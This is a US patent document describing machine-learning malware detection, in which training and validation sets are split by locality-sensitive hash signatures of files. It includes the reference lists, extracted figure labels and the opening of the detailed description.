CPC ............ ***H04L 63/145*** (2013.01); ***G06F 21/56*** (2013.01); ***G06N 20/00*** (2019.01); ***H04L 63/1416*** (2013.01)

(58) **Field of Classification Search**

CPC ... H04L 63/145; H04L 63/1416; G06N 20/00; G06F 21/56

See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

8,925,087 B1 ‡ 12/2014 Oliver ..................... H04L 51/12 726/24
9,960,975 B1 ‡ 5/2018 Van Horenbeeck ........................ H04L 63/1416
10,437,854 B2 * 10/2019 Gabrys ................ G06F 16/273

(Continued)

OTHER PUBLICATIONS

The Extended European Search Report dated Mar. 19, 2018 for European Patent Application No. 18150963.9, 10 pages.‡

(Continued)

*Primary Examiner* — Michael R Vaughan
(74) *Attorney, Agent, or Firm* — Lee & Hayes, P.C.

(57) **ABSTRACT**

Example techniques described herein determine a validation dataset, determine a computational model using the validation dataset, or determine a signature or classification of a data stream such as a file. The classification can indicate whether the data stream is associated with malware. A processing unit can determine signatures of individual training data streams. The processing unit can determine, based at least in part on the signatures and a predetermined difference criterion, a training set and a validation set of the training data streams. The processing unit can determine a computational model based at least in part on the training set. The processing unit can then operate the computational model based at least in part on a trial data stream to provide a trial model output. Some examples include determining the validation set based at least in part on the training set and the predetermined criterion for difference between data streams.

**20 Claims, 12 Drawing Sheets**



(56) **References Cited**

U.S. PATENT DOCUMENTS


| | | | | |
|---|---|---|---|---|
| 11,263,556 | B2 * | 3/2022 | Johnson | G06N 20/00 |
| 2011/0041179 | A1 * | 2/2011 | Ståhlberg | G06F 21/566 726/23 |
| 2011/0078099 | A1 ‡ | 3/2011 | Weston | G06K 9/6231 706/12 |
| 2012/0317644 | A1 ‡ | 12/2012 | Kumar | G06F 21/566 726/24 |
| 2014/0052674 | A1 ‡ | 2/2014 | Aggarwal | G06F 16/353 706/12 |
| 2015/0007319 | A1 ‡ | 1/2015 | Antonov | G06F 21/56 726/23 |
| 2015/0067833 | A1 * | 3/2015 | Verma | H04L 63/1483 726/22 |
| 2015/0128263 | A1 ‡ | 5/2015 | Raugas | H04L 63/1408 726/23 |
| 2016/0306971 | A1 ‡ | 10/2016 | Anderson | G06F 21/563 |
| 2016/0307113 | A1 ‡ | 10/2016 | Calapodescu | G06N 20/00 |
| 2018/0027004 | A1 ‡ | 1/2018 | Huang | H04L 63/1425 726/23 |
| 2018/0121652 | A1 ‡ | 5/2018 | Wang | G06F 21/566 |
| 2018/0197089 | A1 ‡ | 7/2018 | Krasser | H04L 41/145 |
| 2018/0198800 | A1 | 7/2018 | Krasser et al. | |
| 2019/0188212 | A1 ‡ | 6/2019 | Miller | G06F 16/285 |
| 2019/0324430 | A1 * | 10/2019 | Herzog | G05B 23/0283 |


OTHER PUBLICATIONS


"Training, test, and validation sets", retrieved on Mar. 9, 2018 at <<https://en.wikipedia.org/w/index.php?title=Training,_test,_and_validation_sets&oldid=752127502>>, Wikipedia, Nov. 29, 2016, 4 pages.‡

"Early Stopping", retrieved on Mar. 9, 2018 at <<https://en.wikipedia.org/w/index.php?title=Early_stopping&oldid=748816617>>, Wikipedia, Nov. 10, 2016, 5 pages.‡

David, et al., "DeepSign: Deep Learning for Automatic Malware Signature Generation and Classification", 2015 International Joint Conference on Neural Networks (IJCNN), Jul. 1, 2015, IEEE, pp. 1-8.‡

McCaffrey, J.,"Neural Network train-Validate-Test Stopping", Neural Network Lab, May 13, 2015, 8 pages.‡

Microsoft's Rich Signature (undocumented), retrieved Nov. 28, 2016 from <<http://www.ntcore.com/files/richsign.htm>>, 22 pages.‡

"Pairwise Metrics, Affinities and Kernels", Scikit Learn, retrieved Jan. 31, 2017 from <<http://scikit-learn.org/stable/modules/metrics.html>>, 4 pages.‡

Kornblum, J., Identifying Almost Identical Files Using Context Triggered Piecewise Hashing , Digital Investigation, 3S, 2006, 8 pages.‡

Leskovec, et al., Mining Massive Data Sets, Chapter 3, Finding Similar Items, Dec. 2014, retrieved from <http://infolab.stanford.edu/~ullman/mmds/ch3a.pdf>. pp. 55-111.‡

"Introduction to Booster Trees—xgboost 0.6 documentation", retrieved Jan. 31, 2017, from <<http://xgboost.readthedocs.io/en/latest/model.html>>, 7 pages.‡

"Variable Importance in Neural Networks—R is my Friend", retrieved Dec. 3, 2016 from <<https://beckmw.wordpress.com/2013/08/12/variable-importance-in-neural-networks/>>, 8 pages.‡

Wang, et al., "Hashing for similarity Search: A Survey", Aug. 14, 2014, 29 pages.‡

"What are MAPE, MAD, and MSD", Minitab 17 Support, retrieved Jan. 31, 2017 from <<http://support.minitab.com/en-us/minitab/17/topic-library/modeling-statistics/time-series/time-series-models/what-are-mape-mad-and-msd/>>, 2 pages.‡

Wicherski, G., "peHash: A Novel Approach to Fast Malware Clustering", RWTH Aachen University, retrieved from <<https://www.usenix.org/legacy/event/leet09/tech/full_papers/wicherski/wicherski.pdf>>, 8 pages.‡

"Rich Header", Trendy Stephen, Jan. 14, 2008, retrieved from <<http://trendystephen.blogspot.com/2008/01/rich-header.html>>, 2 pages.‡

Slaney, et al., Locality-Sensitive Hashing for Finding Nearest Neighbors , IEEE Signal Processing Magazine, Mar. 2008, 4 pages.‡

"Random Forest", Wikipedia, retrieved Jan. 31, 2017, from <<http://en.wikipedia.org/wiki/Random_forest>>, 7 pages.‡

"Cross-validation (statistics)", Wikipedia, retrieved Jan. 31, 2017 from <<https://en.wikipedia.org/wiki/Cross-validation_(statistics)>>, 8 pages.‡

Dean, et al., "Large Scale Distributed Deep Networks", retrieved Jan. 31, 2017 from <<http://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf >>, 11 pages.‡

Coates, et al., "Deep Learning with COTS HPC Systems", Proceedings of the 30th International Conference on Machine Learning, 2013, retrieved Jan. 31, 2017 from <<http://www.jmlr.org/proceedings/papers/v28/coates13.pdf>>, 9 pages.‡

Freund, et al., "A Short Introduction to Boosting", Journal of Japanese Society for Artificial Intelligence, 14(5), Sep. 1999, pp. 771-780.‡

"Improve Neural Network Generalization and Avoid Overfitting", Mathworks.com, retrieved Jan. 31, 2016, from <<https://help/nnet/ug/improve-neural-network-generalization-and-avoid-overfitting.html>>, 10 pages.‡

"Divide Data for Optimal Neural Network Training", Mathworks.com, retrieved Jan. 31, 2017 from <<https://www.mathworks.com/help/nnet/ug/divide-data-for-optimal-neural-network-training.html>>, 2 pages.‡

Benyamin, D., "A Gentle Introduction to Random Forests, Ensembles, and Performance Metrics in a Commercial System", CitizenNet, Nov. 10, 2012, 16 pages.‡

"Boosting", Wikipedia, retrieved Jan. 31, 2016 from <<https://en.wikipedia.org/wiki/Boosting_(machine_learning)>>, 6 pages.‡

Breiman, et al., "Random Forests", retrieved Jan. 31, 2017 from <<http://machinelearning202.pbworks.com/w/file/fetch/60606349/breiman_randomforests.pdf>>, pp. 1-14.‡

"Alert (TA16-091A)—Ransomware and Recent Variants", US Cert, Mar. 31, 2016, retrieved from <<https://www.us-cert.gov/ncas/alerts/TA16-091A>>, 2 pages.‡

Beck, M., "NeuralNetTools", published no later than Nov. 25, 2016, retrieved from <<https://cran.r-project.org/web/packages/NeuralNetTools/README.html>>, 3 pages.‡

"A New Virus Naming Convention 1991", CARO—Computer Antivirus Research Organization, retrieved Jan. 31, 2017 from <<http://www.caro.org/articles/naming.html>>, 3 pages.‡

"A New Virus Naming Convention 1991", CARO—Computer Antivirus Research Organization, retreived Jan. 31, 2017 from <<http://www.caro.org/articles/naming.html>>, 3 pages.

Beck, M., "NeuralNetTools", published no later than Nov. 25, 2016, retreived from <<https://cran.r-project.org/web/packages/NeuralNetTools/README.html>>, 3 pages.

The European Office Action dated Apr. 28, 2020, for European Patent Application No. 18150963.9, a counterpart foreign application of the U.S. Appl. No. 15/402,503, 5 pages.

Office action for U.S. Appl. No. 15/402,503, dated Sep. 19, 2019, Inventor #1, "Title of Application", 9 pages.

Final Office Action dated Apr. 15, 2020 for U.S. Appl. No. 15/402,503 "Validation-Based Determination of Computational Models" Krasser, 10 pages.

"What are MAPE, MAD, and MSD", Minitab 17 Support, retreived Jan. 31, 2017 from <<http://support.minitab.com/en-us/minitab/17/topic-library/modeling-statistics/time-series/time-series-models/what-are-mape-mad-and-msd/>>, 2 pages.

Wicherski, G., "peHash: A Novel Approach to Fast Malware Clustering", RWTH Aachen University, retried from <<https://www.usenix.org/legacy/event/leet09/tech/full_papers/wicherski/wicherski.pdf>>, 8 pages.

European Office Action dated Nov. 5, 2021 for European Patent Application No. 18150963.9, a foreign counterpart to U.S. Pat. No. 10,826,934, 6 pages.


* cited by examiner
‡ imported from a related application


100
COMPUTING CLUSTER 106
102(1)
102(2)
102(N)
112
COMPUTATIONAL MODEL
VECTOR
3.1
0.41
0.59
-2.6
53.0
0.589
118
SIGNATURE
120
CLASSIFICATION
MALWARE?
BENIGN
VIRUS
WORM
ROOTKIT
SPYWARE
ADWARE
NETWORK(S) 108
114
TRAINING DATA STREAM
116
TRIAL DATA STREAM
104(1)
104(2)
104(3)
104(4)
104(K)
110
122
EXECUTABLE FILE
DOS HEADER
'M' 'Z' ...
PE HEADER
'P' 'E' ...
TEXT SEGMENT
63 78 77 2F 4E 43 4C ...

FIG. 1


200
202
204
206
I/O INTERFACE(S) 208
PROCESSING UNIT(S) 210
MEMORY 212
COMPUTER-READABLE MEDIA 214
OPERATING SYSTEM 216
TRAINING MODULE 226
EXECUTABLE FILE 218
COMPUTATIONAL MODEL 220
REPRESENTATION MODULE 222
OPERATION MODULE 228
PREPARATION MODULE 224
OUTPUT 236
COMMUNICATIONS MODULE 230
COMMUNICATIONS INTERFACE(S) 232
NETWORK(S) 108
234

FIG. 2


300
114
TRAINING DATA STREAMS
302
DETERMINE RESPECTIVE SIGNATURES OF TRAINING DATA STREAMS
304
SIGNATURES
306
DETERMINE TRAINING SET AND VALIDATION SET, EACH INCLUDING TRAINING DATA STREAMS
316
DIFFERENCE CRITERION
308
TRAINING SET
TRAINING STREAMS 310
312
VALIDATION SET
VALIDATION STREAMS 314
318
DETERMINE COMPUTATIONAL MODEL BASED ON TRAINING SET
220
COMPUTATIONAL MODEL
116
TRIAL DATA STREAM
320
OPERATE COMPUTATIONAL MODEL BASED ON TRIAL DATA STREAM
322
TRIAL MODEL OUTPUT

FIG. 3


400
114
TRAINING DATA STREAMS
402
DETERMINE RESPECTIVE SIGNATURES AS LOCALITY-SENSITIVE HASH (LSH) VALUES
404
LSH SIGNATURES
302
406
DETERMINE VALIDATION STREAMS SATISFYING CRITERION W.R.T. TRAINING STREAM(S)
316
DIFFERENCE CRITERION
306
308
TRAINING SET
TRAINING STREAMS
310
312
VALIDATION SET
VALIDATION STREAMS
314
A
408
DETERMINE COMPUTATIONAL MODEL USING SUPERVISED LEARNING PROCESS
COMPUTATIONAL MODEL
220
410
TEST COMPUTATIONAL MODEL BASED AT LEAST IN PART ON AT LEAST ONE VALIDATION STREAM
TRIAL RESULT
412
318
414
SELECTIVELY UPDATE COMPUTATIONAL MODEL BASED AT LEAST IN PART ON RESULT
A

FIG. 4


500
114
TRAINING DATA STREAMS
502
DETERMINE FEATURE VECTORS OF INDIVIDUAL TRAINING DATA STREAMS
504
FEATURE VECTORS
506
ADDITIONAL FEATURES
302
402
508
SELECT ADDITIONAL FEATURE FOR INCLUSION IN THE FEATURE VECTOR
510
DETERMINE RESPECTIVE SIGNATURES AS LSH VALUES OF FEATURE VECTORS
304
SIGNATURES

FIG. 5


600
602
DATA STREAMS
604
DETERMINE RESPECTIVE SIGNATURES OF DATA STREAMS
606
SIGNATURES
608
DETERMINE TRAINING SET AND VALIDATION SET HAVING DATA STREAMS SATISFYING CRITERION
618
DIFFERENCE CRITERION
610
TRAINING SET
DATA STREAM 612
614
VALIDATION SET
DATA STREAM 616
620
DETERMINE COMPUTATIONAL MODEL BASED ON TRAINING SET
622
COMPUTATIONAL MODEL

FIG. 6


700
604
702
Determine Dissimilarity Values Between Streams and Reference Stream
708
Determine Second Dissimilarity Values w.r.t Second Reference Stream
602
Data Streams
Reference Data Stream 706
Second Reference Stream 712
606
Dissimilarity Values 704
Signatures
Second Dissimilarity Values 710
714
Determine Respective Feature Vectors of Data Streams
716
Feature Vectors
718
Determine Locality-Sensitive Hash Values of Feature Vectors
606
Signatures
LSH Values 720

FIG. 7


800
620
806
FIRST HYPERPARAMETER VALUE
804
COMPUTATIONAL MODEL
810
MODEL OUTPUTS
818
SECOND HYPERPARAMETER VALUE
816
SECOND COMPUTATIONAL MODEL
802
DETERMINE COMPUTATIONAL MODEL BASED ON TRAINING SET AND HYPERPARAMETER VALUE
808
OPERATE COMPUTATIONAL MODEL ON VALIDATION STREAMS TO PROVIDE MODEL OUTPUTS
812
DETERMINE THAT MODEL OUTPUTS DO NOT SATISFY COMPLETION CRITERION
814
DETERMINE SECOND CM BASED ON TRAINING SET AND SECOND HYPERPARAMETER VALUE
610
TRAINING SET
DATA STREAM 612
614
VALIDATION SET
DATA STREAM 616

FIG. 8

FIG. 9


620
900
610
Training Set
Data Stream 612
606
Signatures
914
Similarity Criterion
902
Determine Partitions of Training Set
904
Partitions
2nd 906
Jth 908
910
Provide Individual Partitions to Respective Computing Nodes via Communications Interface
912(1)
912(2)
912(J)
Node
Node
Node
916
Receive Respective Results from Computing Nodes
918
Results
920
Determine Computational Model Based on Results
622
Computational Model


1000
1002
TRAINING SET
DATA STREAMS 1004
1006
CANDIDATE SET
DATA STREAMS 1008
1016
DIFFERENCE CRITERION
1012
VALIDATION SET
DATA STREAMS 1014
DETERMINE VALIDATION SET BASED ON TRAINING SET AND DIFFERENCE CRITERION
1010
1020
COMPUTATIONAL MODEL
1018
OPERATE COMPUTATIONAL MODEL BASED ON VALIDATION SET TO PROVIDE MODEL OUTPUTS
1022
MODEL OUTPUTS
1024
DETERMINE THAT MODEL OUTPUTS DO NOT SATISFY COMPLETION CRITERION
1026
COMPLETION CRITERION
1028
UPDATE COMPUTATIONAL MODEL BASED AT LEAST IN PART ON TRAINING DATA STREAMS

FIG. 10

FIG. 11



1010
1100
1006
CANDIDATE SET
DATA STREAMS 1008
1102
DETERMINE SIGNATURES OF CANDIDATE STREAMS
1104
CANDIDATE SIGNATURES
A
1106
DETERMINE FEATURE VECTOR OF DATA STREAM
1108
FEATURE VECTOR
1110
DETERMINE SIGNATURE AS LSH OF FEATURE VECTOR
1002
TRAINING SET
DATA STREAMS 1004
1112
DETERMINE SIGNATURES OF TRAINING STREAMS
1114
TRAINING SIGNATURES
A
1116
SELECT CANDIDATE STREAM FOR VALIDATION SET BASED ON SIGNATURES AND CRITERION
1016
DIFFERENCE CRITERION
1120
1ST SUBSET→TRAINING
1118
DETERMINE SUBSETS OF CANDIDATE SET BASED ON SIGNATURES AND CRITERION
1122
2ND SUBSET→VALIDATION



1200
1002
TRAINING SET
DATA STREAMS 1004
1114
TRAINING SIGNATURES
1202
DETERMINE PARTITIONS OF TRAINING SET BASED ON SIGNATURES
1204
PARTITIONS
1206
PROVIDE INDIVIDUAL PARTITIONS TO RESPECTIVE COMPUTING NODES VIA COMMUNICATIONS INTERFACE
1208
NODES
1028
1210
RECEIVE RESPECTIVE RESULTS FROM COMPUTING NODES
1212
RESULTS
1214
UPDATE COMPUTATIONAL MODEL BASED ON RESULTS
1216
UPDATED COMPUTATIONAL MODEL
1220
TRIAL DATA STREAM
1218
OPERATE UPDATED COMPUTATIONAL MODEL BASED ON TRIAL DATA STREAM
1222
TRIAL MODEL OUTPUT


FIG. 12

# VALIDATION-BASED DETERMINATION OF COMPUTATIONAL MODELS

## RELATED APPLICATION

This application is a divisional of, and claims priority to, U.S. patent application Ser. No. 15/402,503, filed on Jan. 10, 2017, entitled "VALIDATION-BASED DETERMINATION OF COMPUTATIONAL MODELS", the disclosure of which is fully incorporated herein by reference in its entirety.

## BACKGROUND

With computer and Internet use forming an ever greater part of day to day life, security exploits and cyber attacks directed to stealing and destroying computer resources, data, and private information are becoming an increasing problem. For example, "malware", or malicious software, is a general term used to refer to a variety of forms of hostile or intrusive computer programs. Malware is, for example, used by cyber attackers to disrupt computer operations, to access and to steal sensitive information stored on the computer or provided to the computer by a user, or to perform other actions that are harmful to the computer and/or to the user of the computer. Malware may include computer viruses, worms, Trojan horses, ransomware, rootkits, keyloggers, spyware, adware, rogue security software, potentially unwanted programs (PUPs), potentially unwanted applications (PUAs), and other malicious programs programs. Malware may be formatted as executable files (e.g., COM or EXE files), dynamic link libraries (DLLs), scripts, steganographic encodings within media files such as images, and/or other types of computer programs, or combinations thereof.

Malware authors or distributors ("adversaries") frequently disguise or obfuscate malware in attempts to evade detection by malware-detection or -removal tools. Consequently, it is time consuming to determine if a program is malware and, if so, to determine the harmful actions the malware performs without actually running the malware.

Throughout this document, hexadecimal values are prefixed with "Ox" and C-style backslash escapes are used for special characters within strings.

## BRIEF DESCRIPTION OF THE DRAWINGS

The detailed description is described with reference to the accompanying figures. In the figures, the left-most digit(s) of a reference number identifies the figure in which the reference number first appears. The use of the same reference numbers in different figures indicates similar or identical items or features. For brevity of illustration, in the diagrams herein, an arrow beginning with a diamond connects a first component or operation (at the diamond end) to at least one second component or operation that is or can be included in the first component or operation.

FIG. **1** is a block diagram depicting example scenarios for determining and operating computational models as described herein.

FIG. **2** is a block diagram depicting an example computing device configured to participate in determining or operating computational model(s) according to various examples described herein.

FIG. **3** is a dataflow diagram that illustrates example processes for determining and operating computational model(s) according to various examples described herein.



FIG. **4** is a dataflow diagram that illustrates example processes for determining or updating computational model(s) according to various examples described herein.

FIG. **5** is a dataflow diagram that illustrates example processes for determining signatures of data streams according to various examples described herein.

FIG. **6** is a dataflow diagram that illustrates example processes for determining computational model(s) according to various examples described herein.

FIG. **7** is a dataflow diagram that illustrates example processes for determining signatures for use in determining computational model(s) according to various examples described herein.

FIG. **8** is a dataflow diagram that illustrates example processes for determining or updating computational model(s) according to various examples described herein.

FIG. **9** is a dataflow diagram that illustrates example processes for determining computational model(s) using multi-node processing according to various examples described herein.

FIG. **10** is a dataflow diagram that illustrates example processes for updating computational model(s) according to various examples described herein.

FIG. **11** is a dataflow diagram that illustrates example processes for determining training or validation data for training a computational model according to various examples described herein.

FIG. **12** is a dataflow diagram that illustrates example processes for updating or operation computational model(s), e.g., using multi-node update processing, according to various examples described herein.

## DETAILED DESCRIPTION

### Overview

Some examples herein relate to detection or classification of malware, e.g., concealed malware. Some examples herein relate to determining of computational models that can detect malware or that can classify files (or other data streams, and likewise throughout this discussion). Classifications can include, e.g., malware vs. non-malware, or what type of malware (e.g., virus vs. Trojan). Some examples relate to determining representations of files that permit automatically sorting multiple files based on their characteristics, e.g., to permit effective training and validation of computational models. Some examples permit reducing the time or memory or network bandwidth required to train computational models. Some examples permit more effectively detecting or classifying malware samples.

Some examples herein determine a signature of a data stream including data stored in, e.g., a file, a disk boot sector or partition root sector, or a block of memory, or a portion thereof. For brevity, the term "sample" herein refers to a named collection of data from which a data stream can be retrieved, e.g., an individual malware file, a user file such as a document, a benign executable, or a malware-infected user file. The signature can indicate characteristics of the data stream, so that the degree of similarity between the signatures of two streams is positively correlated with the likelihood that those two files are, e.g., from the same family of malware. Signatures can include, but are not limited to, conventional antivirus-detection signatures.

Some examples determine training and validation sets of data based on comparisons of the signatures and then use the training and validation sets to determine a computational model. Some examples select the training and validation sets

so that the signatures of items in the training set are generally different from the signatures of items in the validation set, e.g., using locality-sensitive hashing (LSH) or other nearest-neighbor(s) techniques. Some examples herein can determine a computational model that avoids overfitting and is more accurate for new inputs than can prior schemes. Some examples can significantly reduce the amount of time required to prepare the computational model, compared to prior schemes, by pre-arranging the training and validation sets in memory.

While example techniques described herein may refer to analyzing a program that may potentially be malware, it is understood that the techniques may also apply to other non-malicious software that includes obfuscation or other transformation of computer-executable instructions ("code") of the software. For example, a web server application may include code obfuscation to make it more difficult to locate security vulnerabilities in the code of the web server application. A digital video player may include code obfuscation to make it more difficult to reverse engineer a video decoding process. A commercial software product may include code obfuscation to protect its serial number algorithm so that it is more difficult for a software pirate to generate registration numbers for free. A cryptographic software product may include code obfuscation to hide a cryptographic algorithm. Accordingly, analysis of data streams discussed herein may be used by anti-malware security researchers, white-hat vulnerability researchers, interoperability developers, anti-piracy testers or other analysts of data streams. The above examples are not limiting; not all tools used in generating programs obfuscate their inputs.

Various entities, configurations of electronic devices, and methods for determining and operating computational models, e.g., for stream-analysis or malware-detection applications, are described herein. While many examples described herein relate to servers and other non-consumer electronic devices, other types of electronic devices can be used, e.g., as discussed with reference to FIG. **1**. References throughout this document to "users" can refer to human users or to other entities interacting with a computing system.

## Illustrative Environment

FIG. **1** shows an example scenario **100** in which examples of computational-model-based systems can operate and/or in which computational-model determination and/or use methods such as those described herein can be performed. Illustrated devices and/or components of scenario **100** include computing device(s) **102**(**1**)-**102**(N) (individually and/or collectively referred to herein with reference **102**), where N is any integer greater than and/or equal to 1, and computing devices **104**(**1**)-**104**(K) (individually and/or collectively referred to herein with reference **104**), where K is any integer greater than and/or equal to 1. In some examples, N=K; in other examples, N>K or N<K. Although illustrated as, e.g., desktop computers, laptop computers, tablet computers, and/or cellular phones, computing device(s) **102** and/or **104** can include a diverse variety of device categories, classes, and/or types and are not limited to a particular type of device.

In the illustrated example, computing device(s) **102**(**1**)-**102**(N) can be computing nodes in a cluster computing system **106**, e.g., a cloud service such as GOOGLE CLOUD PLATFORM or another cluster computing system ("computing cluster" or "cluster") having several discrete computing nodes (device(s) **102**) that work together to accomplish a computing task assigned to the cluster as a whole. In some examples, computing device(s) **104** can be clients of cluster **106** and can submit jobs to cluster **106** and/or receive job results from cluster **106**. Computing devices **102**(**1**)-**102**(N) in cluster **106** can, e.g., share resources, balance load, increase performance, and/or provide fail-over support and/or redundancy. Computing devices **104** can additionally or alternatively operate in a cluster and/or grouped configuration. In the illustrated example, computing devices **104** communicate with computing devices **102**. Additionally or alternatively, computing devices **104** can communicate with cluster **106**, e.g., with a load-balancing or job-coordination device of cluster **106**, and cluster **106** or components thereof can route transmissions to individual computing devices **102**.



Some cluster-based systems can have all or a portion of the cluster deployed in the cloud. Cloud computing allows for computing resources to be provided as services rather than a deliverable product. For example, in a cloud-computing environment, resources such as computing power, software, information, and/or network connectivity are provided (for example, through a rental agreement) over a network, such as the Internet. As used herein, the term "computing" used with reference to computing clusters, nodes, and jobs refers generally to computation, data manipulation, and/or other programmatically-controlled operations. The term "resource" used with reference to clusters, nodes, and jobs refers generally to any commodity and/or service provided by the cluster for use by jobs. Resources can include processor cycles, disk space, random-access memory (RAM) space, network bandwidth (uplink, downlink, or both), prioritized network channels such as those used for communications with quality-of-service (QoS) guarantees, backup tape space and/or mounting/unmounting services, electrical power, etc. Cloud resources can be provided for internal use within an organization or for sale to outside customers. In some examples, computer security service providers can operate cluster **106**, or can operate or subscribe to a cloud service providing computing resources.

In some examples, as indicated, computing device(s), e.g., computing devices **102**(**1**) and **104**(**1**), can intercommunicate to participate in and/or carry out computational-model determination and/or operation as described herein. For example, computing device **104**(**1**) can be or include a data source owned or operated by or on behalf of a user, and computing device **102**(**1**) can be a computational-model determination and operation system, as described below.

Different devices and/or types of computing devices **102** and **104** can have different needs and/or ways of interacting with cluster **106**. For example, computing devices **104** can interact with cluster **106** with discrete request/response communications, e.g., for queries and responses using an already-determined computational model. Additionally and/or alternatively, computing devices **104** can be data sources and can interact with cluster **106** with discrete and/or ongoing transmissions of data to be used as input to a computational model or a process of determining a computational model. For example, a data source in a personal computing device **104**(**1**) can provide to cluster **106** data of newly-installed executable files, e.g., after installation and before execution of those files. The data of newly-installed executable files can include, e.g., data such as that as described herein with respect to training data streams **114** or trial data streams **116**. This can provide improved accuracy of outputs of a computational model (CM), e.g., a malware-detection CM, by increasing the amount of data input to the CM. Additionally and/or alternatively, computing devices

**104** can be data sinks and can interact with cluster **106** with discrete and/or ongoing requests for data output from a CM, e.g., updates to firewall or routing rules based on changing network conditions.

In some examples, computing devices **102** and/or **104** can communicate with each other and/or with other computing devices via one or more network(s) **108**. In some examples, computing devices **102** and **104** can communicate with external devices via network(s) **108**. For example, network(s) **108** can include public networks such as the Internet, private networks such as an institutional and/or personal intranet, and/or combination(s) of private and public networks. Communications between computing devices **102** and/or **104** via network(s) **108** can be structured, e.g., according to defined application programming interfaces (APIs). For example, data can be retrieved via network(s) **108**, e.g., using a Hypertext Transfer Protocol (HTTP) request such as a GET to a Web Services and/or Representational State Transfer (REST) API endpoint. Remote Procedure Call (RPC) APIs or other types of APIs can additionally or alternatively be used for network communications.

In some examples, computing devices **102** and/or **104**, e.g., laptops, smartphones, and/or other computing devices **102** and/or **104** described herein, interact with an entity **110** (shown in phantom). The entity **110** can include systems, devices, parties such as users, and/or other features with which computing devices **102** and/or **104** can interact. For brevity, examples of entity **110** are discussed herein with reference to users of a computing system; however, these examples are not limiting. In some examples, computing device **104** is operated by entity **110**, e.g., a user. In some examples, computing devices **102** operate CM(s) to determine a model output corresponding to a file on a user's computing device **104**, and transmit an indication of the model output via network **108** to the computing device **104**, e.g., a smartphone. The computing device **104** can, e.g., present information of the model output to entity **110**. Examples processing of trial files, e.g., from a user's computing device **104**, are discussed in more detail below with reference to at least FIG. **3** or **12**.

Computing device(s) **102** can store one or more computational model(s), CM(s), **112**, individually and/or collectively referred to herein with reference **112**. In some examples, algorithms for determining or operating CM(s) **112** as described herein can be performed on a computing device (e.g., computing device **102**), such as a smart phone, a tablet, a desktop computer, a server, a server blade, a supercomputer, etc. The resulting models can be used on such computing devices and/or on computing devices (e.g., computing device **104**) having one or more input devices, such as a physical keyboard, a soft keyboard, a touch screen, a touch pad, microphone(s), and/or camera(s). In some examples, functions described herein can be shared between one or more computing device(s) **102** and one or more computing device(s) **104**. For example, the computing device(s) **102** can determine a CM **112** initially and the computing device(s) **104** can perform incremental updating of the CM **112**.

In various examples, e.g., of CM(s) **112** for determining signatures of files, classifying files, determining whether files contain malware, or other use cases noted herein, the computational model(s) **112** may include, but are not limited to, multilayer perceptrons (MLPs), neural networks (NNs), gradient-boosted NNs, deep neural networks (DNNs), recurrent neural networks (RNNs) such as long short-term memory (LSTM) networks or Gated Recurrent Unit (GRU) networks, decision trees such as Classification and Regression Trees (CART), boosted trees or tree ensembles such as those used by the "xgboost" library, decision forests, autoencoders (e.g., denoising autoencoders such as stacked denoising autoencoders), Bayesian networks, support vector machines (SVMs), or hidden Markov models (HMMs). The CMs **112** can additionally or alternatively include regression models, e.g., linear or nonlinear regression using mean squared deviation (MSD) or median absolute deviation (MAD) to determine fitting error during the regression; linear least squares or ordinary least squares (OLS); fitting using generalized linear models (GLM); hierarchical regression; Bayesian regression; or nonparametric regression.

The CMs **112** can include parameters governing or affecting the output of the CM **112** for a particular input. Parameters can include, but are not limited to, e.g., per-neuron, per-input weight or bias values, activation-function selections, neuron weights, edge weights, tree-node weights, or other data values. A training module **226**, FIG. **2**, can be configured to determine CMs **112**, e.g., to determine values of parameters in CMs **112**. For example, CMs **112** can be determined using an iterative update rule such as gradient descent (e.g., stochastic gradient descent or AdaGrad) with backpropagation.

In some examples, the training module **226** can determine the CMs **112** based at least in part on "hyperparameters," values governing the training process. Example hyperparameters can include learning rate(s), momentum factor(s), minibatch size, maximum tree depth, regularization parameters, class weighting, or convergence criteria. In some examples, the training module **226** can determine the CMs **112** in an iterative process involving updating and validation. The training data set can be used to update the CMs **112**, and the validation data set can be used in determining (1) whether the updated CMs **112** meet training criteria or (2) how the next update to the CMs **112** should be performed. Examples are discussed herein, e.g., with reference to at least FIG. **8**.

The computing device(s) **102** can be configured to use the determined parameter values of trained CM(s) **112** to, e.g., categorize a file with respect to malware type, and/or to perform other data analysis and/or processing. In some examples, the computing device **104** can be configured to communicate with computing device(s) **102** to operate a CM **112**. For example, the computing device **104** can transmit a request to computing device(s) **102** for an output of the CM(s) **112**, receive a response, and take action based on that response. For example, the computing device **104** can provide to entity **110** information included in the response, or can quarantine or delete file(s) indicated in the response as being associated with malware.

In the illustrated example, computing device(s) **104** provide data streams (or portions thereof, and likewise throughout this document) to computing device(s) **102**. The illustrated data streams include training data stream **114** and trial data stream **116**. Although only one of each stream **114** and **116** is shown, multiple of either can be used. The computing device(s) **102** can determine or operate CM **112** based at least in part on the stream(s) **114** and **116**. The computing device(s) **102** can provide to computing device(s) **104** a signature **118**, a classification **120**, or other outputs of CM **112**. In some examples, at least one of, or all of, the training data stream(s) **114** or trial data stream(s) can comprise or consist of the partial or full contents of respective digital files, e.g., executable files, data files, or system files. In some examples, training data stream **114** can be used in determin-

ing CM **112**, and CM **112** can be operated to determine whether trial data stream **116** is associated with malware.

In the illustrated example, trial data stream **116** includes bytes of an executable file ("EXE") **122**, e.g., a WINDOWS Portable Executable (PE)-format file. The specific illustrated form and contents of executable file **122** are provided for clarity of explanation, and are not limiting. The illustrated executable file **122** includes a DOS (Disk Operating System) header, a PE header, and a TEXT segment including computer-executable instructions. In this example, the first byte of the TEXT segment is an entry point at which execution begins, e.g., after an operating system loads the executable file **122** into memory. Trial data stream **116** can include any number of bytes of the executable file **122**, e.g., of headers, the TEXT segment, or other segments (e.g., a DATA segment holding compile-time-initialized data). In some examples, trial data stream **116** includes ten (or another number of) bytes beginning with the byte at the entry point. Analyzing bytes beginning with or shortly after the entry point can permit identifying characteristics of tool(s) used in preparing the executable file, since such tools often embed specific code sequences in the files they output.

In some examples, data streams **114** and **116** have the same format (although this is not required). Moreover, in some examples, CM **112** can perform the same processing on a training data stream **114** as on a trial data stream **116**. Accordingly, discussion herein of formats or processing of trial data stream **116** can additionally or alternatively apply to training data stream **114**, and vice versa, unless otherwise expressly specified.

